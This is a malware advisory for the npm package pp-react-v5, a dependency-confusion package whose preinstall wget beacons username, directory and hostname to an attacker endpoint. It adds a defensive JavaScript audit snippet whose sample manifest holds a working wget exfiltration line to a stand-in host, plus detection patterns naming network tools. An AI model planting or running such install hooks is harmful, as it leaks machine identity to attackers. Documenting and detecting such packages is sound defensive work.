MAL-2026-3509

Malicious code in pp-react-v5 (npm)

Details

`pp-react-v5` is a dependency confusion package published at the inflated version `10.0.0` to win npm resolution over any internally-hosted package of the same name. The package contains only a `package.json` with no functional source code.

On installation, the `preinstall` script executes a `wget` command that sends a GET request to `http://q9ou9xtw.requestrepo.com/` with the current username (`whoami`), working directory (`pwd`), and hostname as query parameters, beaconing the victim machine's identity to the attacker-controlled endpoint.
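The checks below are an added example, not part of the advisory or of either scanner cited on this page. They flag install-time hooks that call a network tool together with host-identity commands, and list lockfile entries for a package name with whether each was resolved from the public registry. The function names, the `collector.example` host, and the sample manifest and lockfile are constructed for illustration; the lockfile is assumed to use the v2/v3 `packages` map.

```javascript
// Added example (not from the advisory): audit helpers for the behaviour described above.
const HOOKS = ["preinstall", "install", "postinstall"];
const NET_TOOLS = /\b(wget|curl|nc|ncat)\b/;
const HOST_INFO = /\b(whoami|hostname|pwd)\b/;
const HOST_RE = /https?:\/\/([^\/\s"'?$]+)/g;
const PUBLIC_REGISTRY = "https://registry.npmjs.org/";

// One finding per install-time hook that invokes a network tool.
function auditManifest(manifest) {
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (typeof cmd !== "string" || !NET_TOOLS.test(cmd)) continue;
    findings.push({
      name: manifest.name,
      version: manifest.version,
      hook,
      collectsHostInfo: HOST_INFO.test(cmd),
      hosts: [...cmd.matchAll(HOST_RE)].map((m) => m[1]),
    });
  }
  return findings;
}

// Lockfile v2/v3 entries for pkgName, noting whether each came from the public registry.
function findInLockfile(lock, pkgName) {
  const key = "node_modules/" + pkgName;
  return Object.entries(lock.packages || {})
    .filter(([path]) => path === key || path.endsWith("/" + key))
    .map(([path, meta]) => ({
      path,
      version: meta.version,
      fromPublicRegistry: String(meta.resolved || "").startsWith(PUBLIC_REGISTRY),
    }));
}

// Constructed sample data, not the real package contents.
const sampleManifest = {
  name: "pp-react-v5",
  version: "10.0.0",
  scripts: { preinstall: 'wget "http://collector.example/?u=$(whoami)&d=$(pwd)&h=$(hostname)"' },
};
const sampleLock = {
  packages: {
    "node_modules/pp-react-v5": { version: "10.0.0", resolved: PUBLIC_REGISTRY + "pp-react-v5/-/pp-react-v5-10.0.0.tgz" },
    "node_modules/left-pad": { version: "1.3.0" },
  },
};
console.log(auditManifest(sampleManifest), findInLockfile(sampleLock, "pp-react-v5"));
```

A lockfile hit with `fromPublicRegistry: true` for a name that should only exist on an internal registry is the dependency confusion signal; a manifest finding with `collectsHostInfo: true` matches the beaconing pattern.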

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (667950ffe2ed24a98495c0d8d6c3430e3538523c5811caf9fbda829b0773163f)

The package pp-react-v5 was found to contain malicious code.

## Source: ossf-package-analysis (b2291adfbdded958f2fa2a51aa5e582d8ec4bad5bb1c5c9b614bd496732c3578)

The OpenSSF Package Analysis project identified 'pp-react-v5' @ 10.0.0 (npm) as malicious.

It is considered malicious because:

- The package executes one or more commands associated with malicious behavior.

Affected packages

npm / pp-react-v5
Introduced in: 0

No fixed version published yet for pp-react-v5 (npm). Pin to a known-safe version or switch to an alternative.